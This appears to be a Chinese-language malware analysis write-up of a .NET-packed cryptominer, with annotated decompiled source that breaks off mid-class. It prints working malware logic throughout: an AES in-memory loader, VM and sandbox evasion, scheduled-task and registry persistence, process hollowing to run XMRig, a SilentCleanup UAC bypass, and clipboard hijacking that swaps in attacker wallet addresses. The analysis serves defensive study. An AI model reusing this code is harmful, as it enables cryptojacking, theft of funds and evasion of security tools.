一个.net加密壳的挖矿木马分析

 样本md5:02B886B7B245F7CA52172F299D279A0F

 

 

 问题:挖矿木马有时候可以启动,有时候起不来?WHY?逆向看看,结论:

 // Analyst note: this is the process-name check from the miner's main loop
 // (the full method is in Program.Main further down this page). The lowercased
 // ProcessName is compared against four literals; the Cyrillic one still
 // contains an uppercase letter, so it can never match, but "taskmgr",
 // "processhacker" and "procexp" do, and a hit terminates the miner itself.
 // That is why the sample "sometimes fails to start": it exits as soon as
 // Task Manager or a process explorer is open.
 foreach (Process process3 in Process.GetProcesses())
                    {
                        if (process3.ProcessName.ToLower() == "taskmgr" || process3.ProcessName.ToLower() == "processhacker" || process3.ProcessName.ToLower() == "Диспетчер задач" || process3.ProcessName.ToLower() == "procexp")
                        {
                            Environment.Exit(0); // self-termination, not a crash
                        }
                    } 

原来是开启了任务管理器或者processhacker之类的!

 

接下来是过程:

先看下其执行的函数主体:

using System;
using System.IO;
using System.Reflection;
using System.Security.Cryptography;
using System.Text.RegularExpressions;
using Class3;

namespace Systemwindows
{
	// Token: 0x02000002 RID: 2
	internal class System
	{
		// Analyst note: first-stage loader ("crypter" stub). Main() runs the
		// anti-analysis checks in Class3.DADSAOKQW8URHASQWE, then decrypts an
		// embedded .NET assembly and invokes its entry point through
		// Assembly.Load + EntryPoint.Invoke, so the second stage runs inside this
		// process and is not written to disk by the stub. Naming the class
		// "System" shadows the System namespace; the qualified calls below
		// (System.Dsydadaydas() etc.) resolve to this class, not the namespace.

		// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
		/// <summary>
		/// Entry point: run the VM/sandbox checks, then load the decrypted payload.
		/// Each step sits in an empty catch block, so any failure is silent.
		/// </summary>
		private static void Main(string[] args)
		{
			try
			{
				new DADSAOKQW8URHASQWE().Run(); // calls Environment.Exit(0) when a VM or Sandboxie is detected
			}
			catch
			{
			}
			try
			{
				System.Udussdusdu(); // decrypt the embedded assembly and invoke its entry point
			}
			catch
			{
			}
		}

		// Token: 0x06000002 RID: 2 RVA: 0x00002094 File Offset: 0x00000294
		/// <summary>
		/// Reads the stub's own executable (the entry assembly's path) as text.
		/// Both the decryption key and the base64 payload are carried inside this
		/// file, delimited by "polderhelitcer" marker strings (see VtRxeDjqPXmq
		/// and DjqPXmq).
		/// </summary>
		public static string Dsydadaydas()
		{
			return File.ReadAllText(Assembly.GetEntryAssembly().Location);
		}

		// Token: 0x06000003 RID: 3 RVA: 0x000020A5 File Offset: 0x000002A5
		// Filler: the literal is non-empty, so the condition is always false, and
		// both branches return the same {1, 2} anyway. Not called from this class;
		// presumably obfuscator padding.
		private byte[] vsaJ8m2E()
		{
			if ("{1211-222-001-002}".Length <= 0)
			{
				return new byte[]
				{
					1,
					2
				};
			}
			return new byte[]
			{
				1,
				2
			};
		}

		// Token: 0x06000004 RID: 4 RVA: 0x000020D1 File Offset: 0x000002D1
		/// <summary>
		/// Recovers the decryption key: the text between two "polderhelitcer"
		/// markers in the stub's own file, with the markers stripped. Because the
		/// key ships inside the sample, the payload can be recovered statically;
		/// the marker string is also a usable static signature for this packer.
		/// </summary>
		public static string VtRxeDjqPXmq()
		{
			return new Regex("polderhelitcer.*polderhelitcer").Matches(System.Dsydadaydas())[0].Value.Replace("polderhelitcer", "");
		}

		// Token: 0x06000005 RID: 5 RVA: 0x00002101 File Offset: 0x00000301
		// Filler, same pattern as vsaJ8m2E: always returns {1, 2}.
		private byte[] JBbaqw1132dndGL()
		{
			if ("{111-22222-0001-0001}".Length <= 0)
			{
				return new byte[]
				{
					1,
					2
				};
			}
			return new byte[]
			{
				1,
				2
			};
		}

		// Token: 0x06000006 RID: 6 RVA: 0x0000212D File Offset: 0x0000032D
		/// <summary>
		/// Recovers the encrypted payload: splits the stub's own file on
		/// "polderhelitcer" and returns the third segment, which Udussdusdu
		/// base64-decodes before decryption.
		/// </summary>
		public static string DjqPXmq()
		{
			return Regex.Split(System.Dsydadaydas(), "polderhelitcer")[2];
		}

		// Token: 0x06000007 RID: 7 RVA: 0x00002140 File Offset: 0x00000340
		// Filler, same pattern as vsaJ8m2E: always returns {1, 2}.
		private byte[] Hpuodaqds9Ksaw2wB()
		{
			if ("{21141`11-2222-2008421-00001}".Length <= 0)
			{
				return new byte[]
				{
					1,
					2
				};
			}
			return new byte[]
			{
				1,
				2
			};
		}

		// Token: 0x06000008 RID: 8 RVA: 0x0000216C File Offset: 0x0000036C
		/// <summary>
		/// Decrypts the embedded assembly, loads it from memory and invokes its
		/// entry point with an empty argument array. The second stage (the miner
		/// listed further down this page) therefore runs in the stub's process;
		/// nothing is dropped to disk by this step, so in-memory .NET assembly
		/// loading is the behavior to look for here.
		/// </summary>
		public static void Udussdusdu()
		{
			Assembly.Load(System.Decrypt(Convert.FromBase64String(System.DjqPXmq()), System.VtRxeDjqPXmq())).EntryPoint.Invoke(null, new object[]
			{
				new string[0]
			});
		}

		// Token: 0x06000009 RID: 9 RVA: 0x000021A4 File Offset: 0x000003A4
		/// <summary>
		/// AES-decrypts <paramref name="input"/> with a key and IV derived from
		/// <paramref name="key"/>.
		/// </summary>
		/// <param name="input">Ciphertext (the base64-decoded payload).</param>
		/// <param name="key">Passphrase recovered by VtRxeDjqPXmq.</param>
		/// <returns>The plaintext bytes, expected to be a .NET PE image.</returns>
		/// <remarks>
		/// PasswordDeriveBytes is the legacy PBKDF1-style derivation, here with a
		/// hard-coded 4-byte salt {67, 135, 35, 114}. Mode and Padding are not set,
		/// so the AesManaged defaults apply (CBC/PKCS7). The key is taken from the
		/// first GetBytes call (KeySize/8 bytes) and the IV from the next one
		/// (BlockSize/8 bytes). Nothing is disposed. With key, salt and payload all
		/// present in the file, the decryption can be replayed offline.
		/// </remarks>
		public static byte[] Decrypt(byte[] input, string key)
		{
			PasswordDeriveBytes passwordDeriveBytes = new PasswordDeriveBytes(key, new byte[]
			{
				67,
				135,
				35,
				114
			});
			MemoryStream memoryStream = new MemoryStream();
			Aes aes = new AesManaged();
			aes.Key = passwordDeriveBytes.GetBytes(aes.KeySize / 8);
			aes.IV = passwordDeriveBytes.GetBytes(aes.BlockSize / 8);
			CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Write);
			cryptoStream.Write(input, 0, input.Length);
			cryptoStream.Close();
			return memoryStream.ToArray();
		}
	}
}

 

可以确定是在执行加密的.net PE文件。  

 

看下这个函数实现:

new DADSAOKQW8URHASQWE().Run();

using System;
using System.Management;
using System.Runtime.InteropServices;

namespace Class3
{
	// Token: 0x02000004 RID: 4
	public class DADSAOKQW8URHASQWE
	{
		// Analyst note: anti-analysis gate used by the loader stub. Run() calls
		// the two checks below and terminates the process on a hit, which is why
		// the sample does nothing inside a VMware or Hyper-V guest unless the WMI
		// strings are patched at runtime (as done in this write-up).

		// Token: 0x0600000C RID: 12 RVA: 0x00002230 File Offset: 0x00000430
		/// <summary>
		/// Virtual-machine check via WMI: returns true when
		/// Win32_ComputerSystem.Manufacturer or .Model contains
		/// "microsoft corporation" (typically Hyper-V / Virtual PC) or "vmware".
		/// Other hypervisors (VirtualBox, QEMU/KVM, Xen) are not checked here.
		/// </summary>
		public static bool LOWDARAS()
		{
			foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher("Select * from Win32_ComputerSystem").Get())
			{
				string text = managementBaseObject["Manufacturer"].ToString().ToLower();
				if (text.Contains("microsoft corporation") || text.Contains("vmware")) // virtual-machine check
				{
					return true;
				}
				if (managementBaseObject["Model"] != null)
				{
					string text2 = managementBaseObject["Model"].ToString().ToLower();
					if (text2.Contains("microsoft corporation") || text2.Contains("vmware"))
					{
						return true;
					}
				}
			}
			return false;
		}

		// Token: 0x0600000D RID: 13 RVA: 0x00002300 File Offset: 0x00000500
		/// <summary>
		/// Sandboxie check: true when a module handle for "SbieDll.dll" is found
		/// in the current process. Any exception from the P/Invoke is swallowed
		/// and reported as "not sandboxed".
		/// </summary>
		public static bool OIOQR0SASR()
		{
			bool result;
			try
			{
				if (DADSAOKQW8URHASQWE.IASDIJSAIJWEW("SbieDll.dll").ToInt32() != 0)
				{
					result = true;
				}
				else
				{
					result = false;
				}
			}
			catch
			{
				result = false;
			}
			return result;
		}

		// Token: 0x0600000E RID: 14 RVA: 0x00002340 File Offset: 0x00000540
		/// <summary>
		/// Terminates the process; called by Run() when either check fires.
		/// </summary>
		public void Dytp()
		{
			try
			{
				Environment.Exit(0); // exit immediately when running in a virtual-machine environment
			}
			catch
			{
			}
		}

		// Token: 0x0600000F RID: 15
		// NOTE(review): the DllImport carries no EntryPoint, so as decompiled it
		// would resolve to a kernel32 export literally named IASDIJSAIJWEW, which
		// does not exist; the call would throw and OIOQR0SASR would always return
		// false. The signature (string lpModuleName -> IntPtr) and the
		// "SbieDll.dll" argument match GetModuleHandle, so the decompiler has
		// probably dropped the real import name - confirm against the binary's
		// ImplMap table.
		[DllImport("kernel32.dll")]
		public static extern IntPtr IASDIJSAIJWEW(string lpModuleName);

		// Token: 0x06000010 RID: 16 RVA: 0x00002368 File Offset: 0x00000568
		/// <summary>
		/// Runs the VM check and the Sandboxie check in turn; each positive
		/// result exits the process via Dytp(). Exceptions are swallowed, so a
		/// failing WMI query lets execution continue.
		/// </summary>
		public void Run()
		{
			try
			{
				if (DADSAOKQW8URHASQWE.LOWDARAS())
				{
					this.Dytp();
				}
				if (DADSAOKQW8URHASQWE.OIOQR0SASR())
				{
					this.Dytp();
				}
			}
			catch
			{
			}
		}
	}
}

  

可以看到,其会检测虚拟机环境,如果是vmware的,则直接退出了!

 

动态调试,直接修改"text"、"text2"变量,让其不包含vmware!继续往下运行:

private static void Main(string[] args)
		{
			try
			{
				new DADSAOKQW8URHASQWE().Run(); // VM / Sandboxie gate, bypassed in the debugger by patching the WMI strings
			}
			catch
			{
			}
			try
			{
				System.Udussdusdu(); // execution reaches this call next: decrypt and run the embedded second stage
			}
			catch
			{
			}
		}

     // 上述函数的具体实现
// Token: 0x06000008 RID: 8 RVA: 0x0000216C File Offset: 0x0000216C
		/// <summary>
		/// Loads the decrypted second-stage assembly from memory and invokes its
		/// entry point with an empty argument array. Payload and key both come
		/// from the stub's own file (DjqPXmq / VtRxeDjqPXmq); nothing is written
		/// to disk here, so the loaded image has to be captured from memory or
		/// by reproducing Decrypt offline.
		/// </summary>
		public static void Udussdusdu()
		{
			Assembly.Load(System.Decrypt(Convert.FromBase64String(System.DjqPXmq()), System.VtRxeDjqPXmq())).EntryPoint.Invoke(null, new object[]
			{
				new string[0]
			});
		}

  

可以看到是直接运行解密的.net PE数据!解密的key:

 用的是AES解密:

public static byte[] Decrypt(byte[] input, string key)
		{
			// Legacy PBKDF1-style derivation with a hard-coded 4-byte salt; key and
			// IV are consecutive GetBytes() outputs. Mode/Padding are left at the
			// AesManaged defaults (CBC/PKCS7). Everything needed to replay this
			// decryption offline is present in the sample.
			PasswordDeriveBytes passwordDeriveBytes = new PasswordDeriveBytes(key, new byte[]
			{
				67,
				135,
				35,
				114
			});
			MemoryStream memoryStream = new MemoryStream();
			Aes aes = new AesManaged();
			aes.Key = passwordDeriveBytes.GetBytes(aes.KeySize / 8); // KeySize/8 = 32 bytes at the default key size
			aes.IV = passwordDeriveBytes.GetBytes(aes.BlockSize / 8); // BlockSize/8 = 16 bytes
			CryptoStream cryptoStream = new CryptoStream(memoryStream, aes.CreateDecryptor(), CryptoStreamMode.Write);
			cryptoStream.Write(input, 0, input.Length);
			cryptoStream.Close(); // flushes the final block; result is the decrypted PE image
			return memoryStream.ToArray();
		}

  

然后将解密的数据保存为PE文件:

 

 

然后继续打开该PE文件,可以看到完整的挖矿源码了:

using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.IO.Compression;
using System.Management;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Security.Principal;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Windows.Forms;
using Microsoft.Win32;
using MinerAns;
using VolVeRFINAL.Properties;

namespace VolVeRFINAL
{
	// Token: 0x02000002 RID: 2
	internal class Program
	{
		// Analyst note: second-stage payload (decrypted by the Systemwindows stub).
		// Summary of behavior visible in this class:
		//  - copies itself to config.folder\config.FileName and persists via a
		//    scheduled task ("MicrosoftEdgeUpdate", every 3 min) or an HKCU Run key;
		//  - optional VM / Sandboxie checks, optional UAC prompting / bypass;
		//  - unpacks two zipped miners from resources and runs them by process
		//    hollowing into AddInUtil.exe / InstallUtil.exe (see PE.Run);
		//  - optionally drops and runs a second executable (opersystem.exe);
		//  - loops forever: kills its own miner hosts while a task manager is
		//    open, exits if one is found by name, and swaps cryptocurrency
		//    addresses found on the clipboard for the attacker's.
		// Configuration lives in the config class listed further down this page.

		// Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
		/// <summary>
		/// Creates the named mutex config.mutex and returns whether this process
		/// created it. Main() ignores the return value, so the mutex does not
		/// actually enforce a single instance; the only effect is a 2 s pause
		/// when the mutex was newly created.
		/// </summary>
		public static bool UMutexAC()
		{
			bool flag;
			Program.curderApp = new Mutex(false, config.mutex, ref flag); // flag = createdNew
			try
			{
				if (flag)
				{
					Thread.Sleep(2000);
				}
			}
			catch
			{
			}
			return flag;
		}

		// Token: 0x06000002 RID: 2 RVA: 0x00002094 File Offset: 0x00000294
		/// <summary>
		/// Re-launches this executable elevated ("runas" through cmd.exe) and
		/// exits. Because the exception on a declined UAC prompt is swallowed and
		/// the loop condition is re-evaluated, a non-admin user is prompted again
		/// until they accept. Only called when config.forceUAC == "true"; the
		/// config listed on this page sets "forceder", so this path is off.
		/// </summary>
		public static void Defolt()
		{
			while (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
			{
				ProcessStartInfo processStartInfo = new ProcessStartInfo();
				processStartInfo.FileName = "cmd.exe";
				processStartInfo.UseShellExecute = true;
				processStartInfo.Verb = "runas";
				processStartInfo.Arguments = "/k START \"\" \"" + Assembly.GetEntryAssembly().Location + "\" & EXIT";
				try
				{
					Process.Start(processStartInfo);
					Environment.Exit(0);
				}
				catch (Exception)
				{
				}
			}
		}

		// Token: 0x06000003 RID: 3 RVA: 0x00002120 File Offset: 0x00000320
		/// <summary>
		/// Entry point of the second stage. Phases, in order: self-copy,
		/// persistence, anti-analysis, GPU sizing, miner unpacking, optional
		/// dropper, miner launch, C2 beacon, optional UAC bypass, then an
		/// infinite watchdog / clipboard-hijack loop. Almost every step is in an
		/// empty catch block, so partial failures never stop execution.
		/// </summary>
		private static void Main(string[] args)
		{
			try
			{
				// Self-copy to %AppData%\Windows\winupdate.exe (config.folder / config.FileName),
				// replacing any existing copy. File-creation telemetry in that path is a good indicator.
				if (File.Exists(config.folder + "\\" + config.FileName))
				{
					File.Delete(config.folder + "\\" + config.FileName);
				}
				if (!Directory.Exists(config.folder))
				{
					Directory.CreateDirectory(config.folder);
				}
				if (!File.Exists(config.folder + "\\" + config.FileName))
				{
					File.Copy(Assembly.GetEntryAssembly().Location, config.folder + "\\" + config.FileName);
				}
			}
			catch
			{
			}
			try
			{
				Program.UMutexAC(); // return value discarded: no single-instance enforcement
			}
			catch
			{
			}
			if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
			{
				try
				{
					// Non-admin persistence: scheduled task "MicrosoftEdgeUpdate" running the copy every 3 minutes.
					// The goto skips the Run-key branch below, so only one mechanism is installed per run.
					ProcessStartInfo startInfo = new ProcessStartInfo
					{
						FileName = "schtasks.exe",
						CreateNoWindow = false,
						WindowStyle = ProcessWindowStyle.Hidden,
						Arguments = string.Concat(new string[]
						{
							"/create /sc MINUTE /mo 3 /tn \"MicrosoftEdgeUpdate\" /tr \"",
							config.folder,
							"\\",
							config.FileName,
							"\" /f"
						})
					};
					Process.Start(startInfo);
					goto IL_180;
				}
				catch
				{
					goto IL_180;
				}
			}
			try
			{
				// Admin persistence: HKCU\...\CurrentVersion\Run value config.RegName, (re)written via PowerShell.
				// The sandbox trace further down this page shows this exact command line.
				Program.Powershell(string.Concat(new string[]
				{
					"Remove-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '",
					config.RegName,
					"';New-ItemProperty -Path 'HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' -Name '",
					config.RegName,
					"' -Value '\"",
					Path.Combine(config.folder, config.FileName),
					"\"' -PropertyType 'String'"
				}));
			}
			catch
			{
			}
			IL_180:
			// Anti-analysis: Analysis.isVirtualMachine / DetectSandboxie are not on this page; exit(0) on a hit.
			if (config.antiSandbox == "true")
			{
				try
				{
					if (Analysis.isVirtualMachine())
					{
						Environment.Exit(0);
					}
				}
				catch (Exception)
				{
				}
			}
			if (config.antiDebugger == "true")
			{
				try
				{
					if (Analysis.DetectSandboxie())
					{
						Environment.Exit(0);
					}
				}
				catch (Exception)
				{
				}
			}
			if (config.forceUAC == "true") // config value is "forceder", so Defolt() is not reached as configured
			{
				try
				{
					Program.Defolt();
				}
				catch (Exception)
				{
				}
			}
			// GPU sizing: AdapterRAM (bytes) -> MiB -> GiB, last adapter wins. The value is read as uint,
			// so the largest possible result is 4095 MiB -> num3 == 3; "num3 > 4" below can therefore never
			// be true and neither GPU miner is launched. Only the CPU (XMRig) path is live in this build.
			int num = 0;
			ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher("select AdapterRAM from Win32_VideoController");
			foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
			{
				ManagementObject managementObject = (ManagementObject)managementBaseObject;
				uint? num2 = managementObject.Properties["AdapterRAM"].Value as uint?;
				if (num2 != null)
				{
					num = (int)(num2 / 1048576U).Value;
				}
			}
			int num3 = num / 1024;
			// Unpack the embedded miners (zip archives in resources) in memory; each buffer ends up holding
			// the last entry of its archive. Nothing is written to disk here.
			byte[] payloadBuffer = new byte[0];
			byte[] payloadBuffer2 = new byte[0];
			using (MemoryStream memoryStream = new MemoryStream(Resources.xmrig))
			{
				using (ZipArchive zipArchive = new ZipArchive(memoryStream))
				{
					foreach (ZipArchiveEntry zipArchiveEntry in zipArchive.Entries)
					{
						using (MemoryStream memoryStream2 = new MemoryStream())
						{
							zipArchiveEntry.Open().CopyTo(memoryStream2);
							payloadBuffer = memoryStream2.ToArray();
						}
					}
				}
			}
			using (MemoryStream memoryStream3 = new MemoryStream(Resources.ethminer))
			{
				using (ZipArchive zipArchive2 = new ZipArchive(memoryStream3))
				{
					foreach (ZipArchiveEntry zipArchiveEntry2 in zipArchive2.Entries)
					{
						using (MemoryStream memoryStream4 = new MemoryStream())
						{
							zipArchiveEntry2.Open().CopyTo(memoryStream4);
							payloadBuffer2 = memoryStream4.ToArray();
						}
					}
				}
			}
			if (config.dwudauiadjws == "true")
			{
				try
				{
					// Secondary dropper: writes resource iqdisakwe as <folder>\opersystem.exe, runs it, then hides it.
					// The sandbox trace on this page shows opersystem.exe going on to spawn wscript/cmd/schtasks.
					File.WriteAllBytes(config.folder + "\\opersystem.exe", Resources.iqdisakwe);
					new Process
					{
						StartInfo = 
						{
							FileName = config.folder + "\\opersystem.exe"
						}
					}.Start();
					File.SetAttributes(config.folder + "\\opersystem.exe", FileAttributes.Hidden);
				}
				catch
				{
				}
			}
			// Process names whose presence makes the watchdog loop kill the miner hosts.
			List<string> list = new List<string>();
			list.Add("mmc");
			list.Add("ProcessHacker");
			list.Add("Taskmgr");
			list.Add("Диспетчер задач");
			// Miner command lines. args2: XMRig, RandomX (rx/0), 0% donation, CPU cap config.moneroUsage,
			// pool and wallet from config (note "-o" is glued to the pool string). args3/args4: ethminer
			// stratum URLs for ETC / ETH - both unreachable in this build, see the num3 note above.
			string args2 = string.Concat(new string[]
			{
				"--algo rx/0 --donate-level 0   --max-cpu-usage ",
				config.moneroUsage,
				" -o",
				config.moneroPool,
				" -u ",
				config.moneroWallet
			});
			string args3 = string.Concat(new string[]
			{
				"-P stratum1+tcp://",
				config.etcWallet,
				".",
				config.etcWorker,
				"@",
				config.etcPool
			});
			string args4 = string.Concat(new string[]
			{
				"-P stratum1+tcp://",
				config.ethWallet,
				".",
				config.ethWorker,
				"@",
				config.ethPool
			});
			// Hollowing hosts: signed .NET Framework utilities. Detection angle: AddInUtil.exe / InstallUtil.exe
			// with pool connections, miner-style arguments, or sustained CPU use.
			string fileNameWithoutExtension = Path.GetFileNameWithoutExtension("C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddInUtil.exe");
			string fileNameWithoutExtension2 = Path.GetFileNameWithoutExtension("C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe");
			if (num3 > 4) // never true (num3 <= 3), and its goto would skip the "> 8" branch anyway
			{
				try
				{
					Program.PE.Run(payloadBuffer2, "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe", args3);
					goto IL_577;
				}
				catch
				{
					goto IL_577;
				}
			}
			if (num3 > 8) // unreachable: any num3 > 8 is also > 4 and was diverted above
			{
				try
				{
					Program.PE.Run(payloadBuffer2, "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe", args4);
				}
				catch
				{
				}
			}
			try
			{
				IL_577:
				Program.PE.Run(payloadBuffer, "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\AddInUtil.exe", args2); // XMRig hollowed into AddInUtil.exe
			}
			catch
			{
			}
			if (config.WebPanel == "true")
			{
				try
				{
					Host.getTasks(); // C2 beacon; the parsed task list is discarded, so this build only reports
				}
				catch
				{
				}
			}
			if (config.bypassUAC == "owdoaodsoa") // config value is "true", so UAC() is not reached as configured
			{
				try
				{
					if (!new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator))
					{
						Program.UAC();
						Environment.Exit(0);
					}
				}
				catch (Exception)
				{
				}
			}
			for (;;)
			{
				// Watchdog: while any listed tool is running, keep killing the miner host processes so they
				// do not show up in it. Note this spins without sleeping until the tool is closed.
				foreach (string processName in list)
				{
					Process[] processesByName = Process.GetProcessesByName(processName);
					while (processesByName.Length != 0)
					{
						foreach (Process process in Process.GetProcessesByName(fileNameWithoutExtension))
						{
							try
							{
								process.Kill();
							}
							catch
							{
							}
						}
						foreach (Process process2 in Process.GetProcessesByName(fileNameWithoutExtension2))
						{
							try
							{
								process2.Kill();
							}
							catch
							{
							}
						}
						processesByName = Process.GetProcessesByName(processName);
					}
				}
				try
				{
					// Self-termination when a task manager / process explorer is found. The lowercased name can
					// never equal the Cyrillic literal (it contains an uppercase letter); the other three match.
					// This is the behavior the write-up's opening question is about.
					foreach (Process process3 in Process.GetProcesses())
					{
						if (process3.ProcessName.ToLower() == "taskmgr" || process3.ProcessName.ToLower() == "processhacker" || process3.ProcessName.ToLower() == "Диспетчер задач" || process3.ProcessName.ToLower() == "procexp")
						{
							Environment.Exit(0);
						}
					}
					Thread.Sleep(7000);
				}
				catch
				{
				}
				if (config.Hipper == "true")
				{
					// Clipboard hijack: attacker's BTC / ETH / XMR addresses (IoCs) replace any address-shaped
					// clipboard text. The first BTC regex ends in "$+", which still matches end-of-string.
					string text = "bc1qptp78yqeu7cagwaewnf0n4u8wh7ynwvadq2xux";
					string text2 = "0x5B2e5aB2f0bb903c5aB3Efc4958fE4AA48ceed24";
					string text3 = "47jTRtaRQkBapSUtTUNXfzDQC8gJSsqPR3Af78RizkxSdzB5YXwir8b2pC226t6tqRD18acVK2oqJWws5SP7TM1iGzEN7vL";
					try
					{
						Thread.Sleep(500);
						string text4 = Program.Clipboard.GetText();
						if (new Regex("^3[a-km-zA-HJ-NP-Z1-9]{25,34}$+").IsMatch(text4)) // BTC P2SH
						{
							Program.Clipboard.SetText(text);
						}
						if (new Regex("^(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$").IsMatch(text4)) // BTC legacy / bech32
						{
							Program.Clipboard.SetText(text);
						}
						if (new Regex("^0x[a-fA-F0-9]{40}$").IsMatch(text4)) // ETH-style hex address
						{
							Program.Clipboard.SetText(text2);
						}
						if (new Regex("(?:^4[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$)").IsMatch(text4)) // XMR address
						{
							Program.Clipboard.SetText(text3);
						}
					}
					catch (Exception)
					{
					}
				}
			}
		}

		// Token: 0x06000004 RID: 4 RVA: 0x00002B84 File Offset: 0x00000D84
		/// <summary>
		/// Runs powershell.exe hidden with the given argument string and returns
		/// without waiting. Used for the HKCU Run-key persistence; a hidden
		/// PowerShell child of this process with -ItemProperty arguments is the
		/// observable artefact.
		/// </summary>
		/// <param name="args">Complete PowerShell command line.</param>
		public static void Powershell(string args)
		{
			ProcessStartInfo startInfo = new ProcessStartInfo
			{
				FileName = "powershell.exe",
				Arguments = args,
				WindowStyle = ProcessWindowStyle.Hidden,
				CreateNoWindow = true,
				UseShellExecute = false
			};
			Process.Start(startInfo);
		}

		// Token: 0x06000005 RID: 5 RVA: 0x00002BC8 File Offset: 0x00000DC8
		/// <summary>
		/// UAC bypass via the auto-elevating SilentCleanup scheduled task: the
		/// user-writable HKCU\Environment\windir value is pointed at this
		/// executable, the task is started, and the value is removed 2 s later.
		/// AlwaysNotify() aborts first when UAC is at "Always notify". Not
		/// reached with the config on this page (see the bypassUAC check in
		/// Main). Detection: writes to HKCU\Environment\windir, and
		/// schtasks /Run of \Microsoft\Windows\DiskCleanup\SilentCleanup from a
		/// non-system parent.
		/// </summary>
		public static void UAC()
		{
			string text = Assembly.GetExecutingAssembly().Location + " && REM";
			new Program.AlwaysNotify(); // exits the process if UAC is set to always notify
			if (!text.Contains("REM")) // always false: "REM" was just appended
			{
				Environment.Exit(1);
			}
			RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("Environment", true);
			registryKey.SetValue("windir", text);
			new Process
			{
				StartInfo = 
				{
					WindowStyle = ProcessWindowStyle.Hidden,
					FileName = "C:\\windows\\system32\\schtasks.exe",
					Arguments = "/Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I"
				}
			}.Start();
			Thread.Sleep(2000);
			registryKey.DeleteValue("windir"); // clean-up; the key is never closed
		}

		// Token: 0x04000001 RID: 1
		// Handle for the named mutex created in UMutexAC (kept alive for the process lifetime).
		public static Mutex curderApp;

		// Token: 0x02000003 RID: 3
		/// <summary>
		/// UAC-level probe used by UAC(): reads the base64-obfuscated policy value
		/// names "ConsentPromptBehaviorAdmin" and "PromptOnSecureDesktop" from
		/// HKLM\...\Policies\System and exits the process when they equal "2" and
		/// "1" (the "Always notify" setting, under which the SilentCleanup bypass
		/// does not work). A missing value would throw a NullReferenceException
		/// on the ToString() call, which the caller in Main swallows.
		/// </summary>
		public class AlwaysNotify
		{
			// Token: 0x06000007 RID: 7 RVA: 0x00002C78 File Offset: 0x00000E78
			public AlwaysNotify()
			{
				RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System");
				string a = registryKey.GetValue(Encoding.Default.GetString(Convert.FromBase64String("Q29uc2VudFByb21wdEJlaGF2aW9yQWRtaW4="))).ToString(); // "ConsentPromptBehaviorAdmin"
				string a2 = registryKey.GetValue(Encoding.Default.GetString(Convert.FromBase64String("UHJvbXB0T25TZWN1cmVEZXNrdG9w"))).ToString(); // "PromptOnSecureDesktop"
				registryKey.Close();
				if (!(a == "2" & a2 == "1"))
				{
					return;
				}
				Environment.Exit(1);
			}
		}

		// Token: 0x02000004 RID: 4
		/// <summary>
		/// STA wrappers around System.Windows.Forms.Clipboard (which requires an
		/// STA thread). The nested class shadows the WinForms type, hence the
		/// fully qualified calls inside.
		/// </summary>
		public static class Clipboard
		{
			// Token: 0x06000008 RID: 8 RVA: 0x00002D18 File Offset: 0x00000F18
			/// <summary>Reads the clipboard text on a dedicated STA thread.</summary>
			public static string GetText()
			{
				string Return = string.Empty;
				Thread thread = new Thread(delegate()
				{
					Return = System.Windows.Forms.Clipboard.GetText();
				});
				thread.SetApartmentState(ApartmentState.STA);
				thread.Start();
				thread.Join();
				return Return;
			}

			// Token: 0x06000009 RID: 9 RVA: 0x00002D78 File Offset: 0x00000F78
			/// <summary>Replaces the clipboard text on a dedicated STA thread.</summary>
			public static void SetText(string txt)
			{
				Thread thread = new Thread(delegate()
				{
					System.Windows.Forms.Clipboard.SetText(txt);
				});
				thread.SetApartmentState(ApartmentState.STA);
				thread.Start();
				thread.Join();
			}
		}

		// Token: 0x02000005 RID: 5
		/// <summary>
		/// Process-hollowing launcher. Run() starts a legitimate host executable
		/// suspended (dwCreationFlags 4 = CREATE_SUSPENDED), unmaps its image,
		/// writes the miner image from payloadBuffer into the child at the
		/// payload's preferred base, redirects the main thread to the payload's
		/// entry point and resumes it. The result is a signed Microsoft process
		/// name (AddInUtil.exe / InstallUtil.exe) whose memory holds XMRig.
		/// Detection: a suspended child of this process followed by
		/// ZwUnmapViewOfSection / VirtualAllocEx / WriteProcessMemory /
		/// SetThreadContext, or the host images with pool traffic and miner
		/// arguments on the command line. Return values of the native calls are
		/// never checked.
		/// </summary>
		public static class PE
		{
			// Token: 0x0600000A RID: 10
			// lpProcessInfo is a raw 24-byte buffer standing in for PROCESS_INFORMATION (hProcess at 0, hThread at 8).
			[DllImport("kernel32.dll")]
			private unsafe static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, IntPtr lpProcessAttributes, IntPtr lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, Program.PE.StartupInfo* lpStartupInfo, byte[] lpProcessInfo);

			// Token: 0x0600000B RID: 11
			[DllImport("kernel32.dll")]
